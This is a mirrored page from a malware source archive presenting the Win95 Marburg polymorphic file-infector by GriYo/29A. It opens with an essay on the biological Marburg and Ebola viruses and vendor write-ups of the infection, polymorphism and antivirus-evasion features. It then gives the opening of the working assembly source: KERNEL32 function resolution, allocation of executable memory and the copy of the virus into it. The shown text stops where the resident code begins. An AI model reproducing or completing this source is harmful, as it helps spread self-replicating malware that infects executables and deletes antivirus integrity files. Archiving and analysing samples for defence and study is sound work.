mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
4b9382ddbc
push
3985 lines
121 KiB
NASM
3985 lines
121 KiB
NASM
|
||
Marburg virus - BioCoded by GriYo / 29A
|
||
---------------------------------------
|
||
|
||
|
||
|
||
|
||
Index:
|
||
------
|
||
|
||
1 - About the biological version
|
||
2 - Author's description
|
||
3 - Description from Datafellows
|
||
4 - Description from AVP
|
||
5 - Description from DrSolomon
|
||
6 - Marburg source code
|
||
|
||
|
||
|
||
|
||
1 - About the biological version
|
||
--------------------------------
|
||
|
||
1967: Marburg/Frankfurt, Germany.
|
||
|
||
Laboratory workers preparing primary cell cultures from African
|
||
green monkeys resulted in an outbreak of a previously unrecognised disease.
|
||
Highly infectious: 31 cases, 7 deaths.
|
||
|
||
1976:
|
||
|
||
Outbreak of a previously unrecognised haemorrhagic fever in Zaire
|
||
and Sudan 'Ebola disease': 500 diagnosed cases, 460 deaths.
|
||
|
||
Ebola virus, a member of the Filoviridae, burst from obscurity with
|
||
spectacular outbreaks of severe, haemorrhagic fever. It was first
|
||
associated with an outbreak of 318 cases and a case-fatality rate of 90%
|
||
in Zaire and caused 150 deaths among 250 cases in Sudan. Smaller outbreaks
|
||
continue to appear periodically, particularly in East, Central and southern
|
||
Africa. In 1989, a haemorrhagic disease was recognized among cynomolgus
|
||
macaques imported into the United States from the Philippines. Strains of
|
||
Ebola virus were isolated from these monkeys. Serologic studies in the
|
||
Philippines and elsewhere in Southeast Asia indicated that Ebola virus is a
|
||
prevalent cause of infection among macaques.
|
||
|
||
These threadlike polymorphic viruses are highly variable in length
|
||
apparently owing to concatemerization. However, the average length of an
|
||
infectious virion appears to be 920 nm. The virions are 80 nm in diameter
|
||
with a helical nucleocapsid, a membrane made of 10 nm projections, and
|
||
host cell membrane. They contain a unique single-stranded molecule of
|
||
noninfectious (negative sense) RNA. The virus is composed of 7
|
||
polypeptides, a nucleoprotein, a glycoprotein, a polymerase and 4 other
|
||
undesignated proteins. Proteins are produced from polyadenylated
|
||
monocistronic mRNA species transcribed from virus RNA. The replication in
|
||
and destruction of the host cell is rapid and produces a large number of
|
||
viruses budding from the cell membrane.
|
||
|
||
Epidemics have resulted from person to person transmission, nosocomial
|
||
spread or laboratory infections. The mode of primary infection and the
|
||
natural ecology of these viruses are unknown. Association with bats has
|
||
been implicated directly in at least 2 episodes when individuals entered
|
||
the same bat-filled cave in Eastern Kenya. Ebola infections in Sudan in
|
||
1976 and 1979 occurred in workers of a cotton factory containing thousands
|
||
of bats in the roof. However, in all instances, study of antibody in bats
|
||
failed to detect evidence of infection, and no virus was isolated from bat
|
||
tissue.
|
||
|
||
The index case in 1976 was never identified, but this large outbreak
|
||
resulted in 280 deaths of 318 infections. The outbreak was primarily the
|
||
result of person to person spread and transmission by contaminated needles
|
||
in outpatient and inpatient departments of a hospital and subsequent
|
||
person to person spread in surrounding villages. In serosurveys in Zaire,
|
||
antibody prevalence to Ebola virus has been 3 to 7%. The incubation period
|
||
for needle-transmitted Ebola virus is 5 to 7 days and that for person to
|
||
person transmitted disease is 6 to 12 days.
|
||
|
||
The virus spreads through the blood and is replicated in many organs.
|
||
The histopathologic change is focal necrosis in these organs, including
|
||
the liver, lymphatic organs, kidneys, ovaries and testes. The central
|
||
lesions appear to be those affecting the vascular endothelium and
|
||
the platelets. The resulting manifestations are bleeding, especially in
|
||
the mucosa, abdomen, pericardium and vagina. Capillary leakage appears to
|
||
lead to loss of intravascular volume, bleeding, shock and the acute
|
||
respiratory disorder seen in fatal cases. Patients die of intractable shock.
|
||
Those with severe illness often have sustained high fevers and are
|
||
delirious, combative and difficult to control.
|
||
|
||
The serologic method used in the discovery of Ebola was the direct
|
||
immunofluorescent assay. The test is performed on a monolayer of infected
|
||
and uninfected cells fixed on a microscopic slide. IgG- or IgM-specific
|
||
immunoglobulin assays are performed. These tests may then be confirmed
|
||
by using western blot or radioimmunoprecipitation. Virus isolation is also
|
||
a highly useful diagnostic method, and is performed on suitably preserved
|
||
serum, blood or tissue specimens stored at -70oC or freshly collected.
|
||
|
||
No specific antiviral therapy presently exists against Ebola virus, nor does
|
||
interferon have any effect. Past recommendations for isolation of the
|
||
patient in a plastic isolator have given way to the more moderate
|
||
recommendation of strict barrier isolation with body fluid precautions.
|
||
This presents no excess risk to the hospital personnel and allows
|
||
substantially better patient care, as shown in Table 2. The major factor in
|
||
nosocomial transmission is the combination of the unawareness of the
|
||
possibility of the disease by a worker who is also inattentive to the
|
||
requirements of effective barrier nursing. after diagnosis, the risk of
|
||
nosocomial transmission is small.
|
||
|
||
The basic method of prevention and control is the interruption of person to
|
||
person spread of the virus. However, in rural areas, this may be difficult
|
||
because families are often reluctant to admit members to the hospital
|
||
because of limited resources and the culturally unacceptable separation
|
||
of sick or dying patients from the care of their family. Experience
|
||
with human disease and primate infection suggests that a vaccine inducing a
|
||
strong cell-mediated response will be necessary for virus clearance and
|
||
adequate protection. Neutralizing antibodies are not observed in
|
||
convalescent patients nor do they occur in primates inoculated with killed
|
||
vaccine. A vaccine expressing the glycoprotein in vaccinia is being
|
||
prepared for laboratory evaluation.
|
||
|
||
Emerging & Re-emerging Viruses: An Essay
|
||
Alison Jacobson
|
||
Department of Microbiology
|
||
University of Cape Town
|
||
|
||
|
||
|
||
|
||
2 - Author's description
|
||
------------------------
|
||
|
||
Marburg is a direct action Win32 executable files infector. Lets
|
||
look at its features in more detail...
|
||
|
||
2.1. Infection
|
||
|
||
When an infected file is run the virus will look for *.EXE and *.SCR
|
||
files in current directory, as well as WINDOWS and WINDOWS system
|
||
directories. Marburg use size padding to mark infected files. Depending on
|
||
the internal format of each file the virus sometimes infects them without
|
||
modifying the entry-point field in the file header. In some files Marburg
|
||
overwrites the code at its host entry-point with a block or polymorphic
|
||
code. This code is used to hide the branch to viral code. Marburg infects
|
||
files by mapping them in memory. This allows the virus to speed up its
|
||
infection procedures.
|
||
|
||
2.2. Polymorphism
|
||
|
||
The virus is encrypted under a polymorphic decryptor. The
|
||
polymorphic engine uses slow mutation technics and can generate lots of
|
||
different looking code.
|
||
|
||
2.3. Retro
|
||
|
||
Some intergrity checksum files deleted on infection.
|
||
|
||
2.4. Error-handling
|
||
|
||
The virus startup and infection routines uses estructured exception
|
||
handling to prevent the virus from causing FAULTS at any time. This makes
|
||
Marburg a very stable virus.
|
||
|
||
2.5. Payload
|
||
|
||
A nice graphic payload inside... I think this is a must for viruses
|
||
that works under GUI.
|
||
|
||
|
||
|
||
|
||
3 - Description from Datafellows
|
||
--------------------------------
|
||
|
||
NAME: Marburg
|
||
TYPE: Non-resident EXE -files
|
||
|
||
The Win95/Marburg virus got widespread circulation in August 1998,
|
||
when it was included on the master CD of the popular MGM/EA PC CD-ROM game
|
||
"Wargames". The CD contains one file infected by the Marburg virus:
|
||
|
||
\EREG\EREG32.EXE
|
||
|
||
MGM - the publisher of the game - made an announcment on this on
|
||
12th of August, 1998:
|
||
|
||
|
||
--------
|
||
From: "K.Egan (MGM)" kegan@mgm.com
|
||
Subject: MGM WarGames Statement
|
||
Date: Wed, 12 Aug 1998 18:03:39 -0700
|
||
|
||
MGM Interactive recently learned that its WarGames PC game shipped
|
||
with the Win32/Marburg.a virus contained in the electronic
|
||
registration program. The company is working as fast as it can to
|
||
resolve the problem.
|
||
...
|
||
MGM Interactive is committed to delivering top quality products to
|
||
consumers. This is an unfortunate circumstance and we sincerely
|
||
apologize for any convenience this has caused you.
|
||
...
|
||
If you have any questions or if you would like to receive a
|
||
replacement disc, please contact MGM Interactive.
|
||
--------
|
||
|
||
|
||
The same virus also got widespread circulation in August 1998, when it was
|
||
included on the cover CD of the Australian "PC Power Play" magazine. This CD
|
||
contains these files infected by the Marburg virus:
|
||
|
||
\GAMES\MAX2\MAX2BETA.EXE
|
||
\GAMES\STARTREK\FURYDEMO.EXE
|
||
|
||
In July 1998, the Win95/Marburg virus got yet again widespread circulation
|
||
when it was included by accident on the cover CD of the UK-based PC Gamer
|
||
Magazine's July 1998 edition. The infected files are on "CD Gamer 2"
|
||
included with the magazine, and are called:
|
||
|
||
\UTILS\XEARTH\XEARTH.EXE
|
||
\UTILS\QPAINT\QPAINT.EXE
|
||
\VIDEO\SMACKPLW.EXE
|
||
|
||
The SMACKPLW program is automatically executed if you watch any of the
|
||
preview videos from the CD. There are localized versions of the PC Gamer
|
||
magazine in circulation in addition to the UK edition.
|
||
|
||
The Swedish edition has these files infected instead of the ones listed
|
||
above:
|
||
|
||
\SHARE\3DJONG\M3DJONGG.EXE
|
||
\PATCHAR\QUAKE2\Q2-315~8.EXE
|
||
\SPEL\KKND2\DIRECTX\DDHELP.EXE
|
||
|
||
The Slovenian edition has the same infected files as the UK edition. The
|
||
Italian July/August edition is clean.
|
||
|
||
Marburg is a polymorphic Windows 95/98 virus which contains this text:
|
||
|
||
[ Marburg ViRuS BioCoded by GriYo/29A ]
|
||
|
||
Marburg infects Win32 EXE and SCR (screen saver) files, encrypting its own
|
||
code with variable polymorphic encryption layer. The polymorphic engine of
|
||
the virus is advanced. It encrypts the virus with 8, 16 and 32 bit key with
|
||
several different methods. The virus uses slow polymorphisism, which means
|
||
that it changes the decryptor of itself very slowly.
|
||
|
||
Marburg deletes integrity databases of several anti-virus products. It also
|
||
avoids infecting many known anti-virus product executable files, including
|
||
any executable which has the letter "V" in its name. This is done to avoid
|
||
triggering the self-check of these programs.
|
||
|
||
Marburg activates three months after initial infection. If an infected
|
||
application is executed exactly on the same hour as the inital infection,
|
||
the virus displays the standard Windows error icon (red cross in white
|
||
circle) in random positions all over the screen.
|
||
|
||
|
||
|
||
|
||
4 - Description from AVP
|
||
------------------------
|
||
|
||
This is a direct action (nonmemory resident) Windows95 polymorphic
|
||
virus. It affects PE EXE (Portable Executable) files which it searches in
|
||
current, Windows and System directories. Because of bugs the virus is not
|
||
able to replicate under Windows NT, so it is Windows95 specific virus.
|
||
|
||
When an infected file is executed, the virus searches for KERNEL32 routines:
|
||
first for GetModuleHandleA and GetProcAddress, then for 22 more functions
|
||
(see the list below). While searching the virus uses method similar to
|
||
"Win32.Cabanas" virus: while infecting a file the virus scans file's
|
||
imported table for GetModuleHandleA and GetProcAddress, and saves these
|
||
addresses in virus code. If there are no these entries in table, the virus
|
||
scans KERNEL32 code.
|
||
|
||
If the virus is not able to locate KERNEL32 functions, it immediately
|
||
returns to the host file. Otherwise it allocates a block of system memory,
|
||
copies its code to there (that's necessary to run virus polymorphic engine),
|
||
then searches for files and infects them.
|
||
|
||
While infecting a file the virus writes its code to the end of file into the
|
||
last section, increasing its length beforehand. Before saving its code to
|
||
the file the virus encrypts it by polymorphic routine (the polymorphic
|
||
engine is very similar with one that was found in "Win95.HPS" virus).
|
||
Depending on file structure the virus also does some tricks to make virus
|
||
detection and disinfection procedures more complex: either replaces entry
|
||
point address in the PE header with its own one (majority of Win32 viruses
|
||
infect files in this way), or saves JMP_Virus instruction to the file entry
|
||
address and does not modifies it in the PE header (in same way as
|
||
"Win32.Cabanas" virus does), or writes to the entry point a polymorphic
|
||
junk routine that is followed by JMP_Virus instruction.
|
||
|
||
Before infecting the virus deletes anti-virus data files: ANTI-VIR.DAT,
|
||
CHKLIST.MS, AVP.CRC, IVB.NTZ. While infecting the virus checks file names
|
||
and does not infect files that have 'V' letter in name as well as
|
||
anti-viruses PANDA, F-PROT, SCAN.
|
||
|
||
Depending on the system date (when infected file is executed in three month
|
||
during the same hour as being infected) the virus displays at random
|
||
selected positions on the screen the standard Windows error icon - red cross
|
||
in white circle.
|
||
|
||
The virus contains the text strings (the first block contains the list of
|
||
functions that virus is looking for):
|
||
|
||
GetModuleHandleA
|
||
GetProcAddress
|
||
CreateFileA
|
||
CreateFileMappingA
|
||
MapViewOfFile
|
||
UnmapViewOfFile
|
||
CloseHandle
|
||
FindFirstFileA
|
||
FindNextFileA
|
||
FindClose
|
||
VirtualAlloc
|
||
GetWindowsDirectoryA
|
||
GetSystemDirectoryA
|
||
GetCurrentDirectoryA
|
||
SetFileAttributesA
|
||
SetFileTime
|
||
DeleteFileA
|
||
GetCurrentProcess
|
||
WriteProcessMemory
|
||
LoadLibraryA
|
||
GetSystemTime
|
||
GetDC
|
||
LoadIconA
|
||
DrawIcon
|
||
|
||
[ Marburg ViRuS BioCoded by GriYo/29A ]
|
||
KERNEL32.dll USER32.dll
|
||
|
||
|
||
|
||
|
||
5 - Description from DrSolomon
|
||
------------------------------
|
||
|
||
Win32/Marburg
|
||
Polymorphic virus
|
||
Infects: Windows-95 executable files
|
||
(PE files - "Portable Executable")
|
||
|
||
This highly polymorphic virus infects Windows-95 executable files
|
||
(PE files - "Portable Executable"). When the infected file is run it
|
||
searches for executable files to infect in the current directory, the
|
||
Windows directory and the System directory. The virus does not go
|
||
memory-resident - instead it is a direct action virus. The infected files
|
||
always grow in size.
|
||
|
||
The sizes of infected files are changed by the the virus to be divisible by
|
||
101 (decimal). It does this to avoid infecting the same file twice.
|
||
|
||
If the virus comes across integrity-checking databases (ANTI-VIR.DAT,
|
||
CHKLIST.MS, AVP.CRC, IVB.NTZ) in the above mentioned subdirectories it
|
||
deletes them. This is an attempt to avoid detection by certain anti-virus
|
||
products.
|
||
|
||
The virus does not infect any files having letter "V" in the name,
|
||
"PAND*.*" , "F-PR*.*" , "SCAN*.*" (this is to avoid infecting certain
|
||
anti-virus programs).
|
||
|
||
The payload of the virus triggers at a random date and displays an error
|
||
icon (a red cross on white circle) on the screen.
|
||
|
||
Marburg has been seen in the wild, and was accidentally distributed on the
|
||
cover CD ROM of UK magazine PC Gamer in July 1998. The virus was written by
|
||
Griyo of the Spanish virus-writing gang 29A.
|
||
|
||
|
||
|
||
|
||
|
||
6 - Marburg source code
|
||
-----------------------
|
||
|
||
After some time lost into Win32 internals im happy to present my
|
||
first attempt at this plattaform. This is a Win95 highly polymorphic direct-
|
||
action PE infector.
|
||
|
||
Greetings to all the people at IRC-Hispano #virus and #hack irc channels.
|
||
Special greetings goes this time to Jacky Qwerty, this virus wouldnt be
|
||
posible without his support.
|
||
|
||
-------->8 cut here ---------------------------------------------------------
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;
|
||
; Marburg ViRuS - BioCoded by GriYo / 29A
|
||
;
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
.386P
|
||
locals
|
||
jumps
|
||
.model flat,STDCALL
|
||
|
||
;Include the following files
|
||
|
||
include Win32api.inc
|
||
include Useful.inc
|
||
include Mz.inc
|
||
include Pe.inc
|
||
|
||
;Some externals only used on 1st generation
|
||
|
||
extrn GetModuleHandleA:NEAR
|
||
extrn GetProcAddress:NEAR
|
||
extrn ExitProcess:NEAR
|
||
|
||
;Some assumptions only valid for 1st generation
|
||
|
||
mem_size equ mem_end-Mem_Base ;Size of virus in memory
|
||
inf_size equ inf_end-Mem_Base ;Size of virus in files
|
||
init_size equ init_end-Mem_Base ;Size of init code
|
||
base_default equ 00400000h ;Default base address
|
||
|
||
;Current in-build settings
|
||
|
||
SIZE_PADDING equ 00000065h
|
||
DECRYPTOR_SIZE equ 00000800h
|
||
BUFFER_EP equ 00000100h
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Fake host used for virus 1st generation
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
_TEXT segment dword use32 public 'CODE'
|
||
|
||
host_entry: ;This code will find the base address of KERNEL32.DLL and
|
||
;the entry point for GetProcAddress and GetModuleHandle
|
||
;functions
|
||
;This part will not be included on future infections
|
||
;coz its only needed for virus 1st generation
|
||
|
||
;Get KERNEL32 module handle
|
||
|
||
push offset szKernel32
|
||
call GetModuleHandleA
|
||
or eax,eax
|
||
jz exit1st_gen
|
||
mov dword ptr [a_Kernel32],eax
|
||
|
||
;Get address of GetModuleHandle function
|
||
|
||
push offset szGetModuleH
|
||
push eax
|
||
call GetProcAddress
|
||
or eax,eax
|
||
jz exit1st_gen
|
||
mov dword ptr [a_GetModuleH],eax
|
||
|
||
;Get address of GetProcAddress function
|
||
|
||
push offset szGetProcAddr
|
||
push dword ptr [a_Kernel32]
|
||
call GetProcAddress
|
||
or eax,eax
|
||
jz exit1st_gen
|
||
mov dword ptr [a_GetProcAddr],eax
|
||
|
||
;Execute virus
|
||
|
||
mov ebx,base_default
|
||
xor ebp,ebp
|
||
call entry1st_gen
|
||
|
||
exit1st_gen: ;Terminate virus launch process
|
||
|
||
xor eax,eax
|
||
push eax
|
||
call ExitProcess
|
||
|
||
_TEXT ends
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
_DATA segment dword use32 public 'DATA'
|
||
_DATA ends
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
_BSS segment dword use32 public 'BSS'
|
||
_BSS ends
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Virus main body
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
virseg segment dword use32 public 'Marburg'
|
||
|
||
Mem_Base equ this byte
|
||
|
||
virus_entry: ;Get delta offset and host base address
|
||
|
||
call get_delta
|
||
|
||
init_end equ this byte
|
||
|
||
get_delta: pop ebp
|
||
mov ebx,ebp
|
||
sub ebp,offset get_delta
|
||
|
||
;Get host base address
|
||
;Generate a SUB ebx,fix_baseaddr instruction
|
||
|
||
db 81h,0EBh
|
||
fix_baseaddr dd 00000000h
|
||
|
||
;Prepare return address
|
||
|
||
mov eax,ebx
|
||
|
||
;Generate ADD eax,rva_org_eip
|
||
|
||
db 05h
|
||
rva_org_eip dd 00000000h
|
||
|
||
;Save host entry-point into stack, we will jump there
|
||
;later using a RET
|
||
|
||
push eax
|
||
|
||
entry1st_gen: ;End of virus initialization, at this point:
|
||
;
|
||
; ss:[esp] - Host entry-point
|
||
; ebx - Base address
|
||
; ebp - Delta offset
|
||
;
|
||
|
||
;Check if we know the GetModuleHandle entry point
|
||
;If we dont know it try to get KERNEL32 base
|
||
;address using our own code
|
||
|
||
db 0B8h
|
||
rva_GetModuleH dd offset a_GetModuleH-base_default
|
||
or eax,eax
|
||
jz use_our_own_1
|
||
|
||
;Yes, eax is the rva for the function address
|
||
|
||
push dword ptr [eax+ebx]
|
||
pop dword ptr [ebp+a_GetModuleH]
|
||
|
||
;Now we know the address of GetModuleHandle,
|
||
;so use it in order to get KERNEL32.dll
|
||
;base address
|
||
;If the function fails try to get KERNEL32 base
|
||
;address using our own function
|
||
|
||
lea eax,dword ptr [ebp+szKernel32]
|
||
push eax
|
||
|
||
call dword ptr [ebp+a_GetModuleH]
|
||
or eax,eax
|
||
jnz got_kernel
|
||
|
||
use_our_own_1: ;No, grrr, try to get it by ourself
|
||
|
||
call my_getkernel
|
||
or eax,eax
|
||
jz err_virus_init
|
||
|
||
got_kernel: ;Save KERNEL32 base address for l8r use
|
||
|
||
mov dword ptr [ebp+a_Kernel32],eax
|
||
|
||
;Now check if we know the GetProcAddress entry point
|
||
|
||
db 0B8h
|
||
rva_GetProcAddr dd offset a_GetProcAddr-base_default
|
||
or eax,eax
|
||
jz use_our_own_2
|
||
|
||
;Yes, eax is the rva for the function address
|
||
|
||
push dword ptr [eax+ebx]
|
||
pop eax
|
||
jmp short got_getprocaddr
|
||
|
||
use_our_own_2: ;Use our own routine to get GetProcAddress entry point
|
||
|
||
call my_GetProcAddr
|
||
|
||
got_getprocaddr:;Save GetProcAddress entry point for l8r use
|
||
|
||
mov dword ptr [ebp+a_GetProcAddr],eax
|
||
|
||
;Use GetProcAddress to get the rest of function addresses
|
||
|
||
call get_functions
|
||
jecxz err_virus_init
|
||
|
||
;Allocate some memory for the virus
|
||
|
||
push PAGE_EXECUTE_READWRITE
|
||
push MEM_RESERVE or MEM_COMMIT
|
||
push mem_size+inf_size
|
||
push 00000000h
|
||
call dword ptr [ebp+a_VirtualAlloc]
|
||
|
||
;Exit if cant find free memory... mmm...
|
||
|
||
or eax,eax
|
||
jz err_virus_init
|
||
|
||
;Copy virus to allocated memory
|
||
|
||
lea esi,dword ptr [ebp+Mem_Base]
|
||
mov edi,eax
|
||
mov ecx,mem_size
|
||
cld
|
||
rep movsb
|
||
|
||
;Jump to virus code into allocated memory
|
||
|
||
add eax,mem_entry-Mem_Base
|
||
jmp eax
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Entry point for resident code
|
||
